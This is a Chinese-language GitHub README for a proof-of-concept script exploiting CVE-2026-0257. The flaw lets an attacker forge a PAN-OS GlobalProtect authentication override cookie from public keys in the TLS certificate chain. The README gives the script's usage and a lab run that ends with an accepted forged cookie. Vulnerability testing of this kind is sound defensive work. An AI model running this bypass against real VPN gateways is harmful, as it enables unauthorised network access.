sfewer-r7/CVE-2026-0257
GitHub: sfewer-r7/CVE-2026-0257
针对 PAN-OS GlobalProtect 认证绕过漏洞 CVE-2026-0257 的 PoC 脚本,通过提取 TLS 证书链公钥伪造身份验证覆盖 cookie 来验证目标系统是否存在该漏洞。
Stars: 26 | Forks: 9
# 利用 TLS 中的公钥伪造 GlobalProtect 身份验证覆盖 cookie (CVE-2026-0257)
这是一个用于测试目标 PAN-OS GlobalProtect 门户或网关是否存在 [CVE-2026-0257](https://security.paloaltonetworks.com/CVE-2026-0257) 漏洞的概念验证脚本。该脚本将尝试通过遍历 HTTPS 服务所使用的证书链来伪造有效的身份验证覆盖 cookie。对于证书链中的每一个公钥,脚本都会伪造一个新的身份验证覆盖 cookie,并在 GlobalProtect 目标上对其进行测试,以验证其是否有效。
成功伪造的 cookie 将能够登录到 GlobalProtect 目标并获取 VPN 连接信息(使用 `--verbose` 参数以查看详情)。
## 用法
```
$ python forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID]
[--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]
Forge a GlobalProtect auth override cookie using the public key from TLS (CVE-2026-0257).
options:
-h, --help show this help message and exit
--target TARGET Target GlobalProtect portal or gateway (IP or hostname)
--port PORT Target port (default: 443)
--user USER Username to forge cookie for (default: admin)
--domain DOMAIN Domain for cookie (default: empty)
--host-id HOST_ID Host ID for cookie (default: empty)
--client-os CLIENT_OS
Client OS for cookie (default: Windows)
--client-ip CLIENT_IP
Client IP in cookie (default: 0.0.0.0)
--context {gateway,portal,both}
Context to test: gateway, portal, or both (default target)
--verbose Print full response
```
## 示例
```
$ python forge_cookie.py --target 192.168.86.99
[*] Retrieving certificate chain from 192.168.86.99:443 ...
Found 2 certificate(s) in chain:
[0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
[1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)
[*] Forging cookie for user 'admin', testing each key
Trying [0] CN=192.168.86.99
[-] Failure - Gateway did not accepted the forged cookie
[-] Failure - Portal did not accepted the forged cookie
Trying [1] CN=GP-Lab-CA
[+] Success - Gateway accepted the forged cookie
Cookie: bvUbfM5n5rWnZp8tp3AIE8Q/v9L7rJSgRb1suYHHBedwBrfUr4pItrluBYtQ3VtmkF0AYXw9hyipzrMC5qg0JO+ZHuZpHLIFNfhergPGRbLFBkRk9sriFMuGiRU1q3bBSF7PzxDn+0dy0+fG4Wf7u+JD4qQEcw+tIgp9UKv0IhyFY9XxwzYdrQucA8P9zKRkGiEQpFwD776mONJKnHZTe+R+D/wy49ATBWETuhD2NP+7dB2IeSfV2eGBiZWTJcLAxXpQHcKRImhTGKlw9o4Frw+RBVqh9aCXCQ4yLYuAviabWpV94Fhp/3aPVTrLDCOrbBilsu6Men9oOT3+b8Uw2g==
```
标签:Maven, PAN-OS, PoC, Python, StruQ, VPN, 无后门, 暴力破解, 漏洞验证, 身份认证绕过, 逆向工具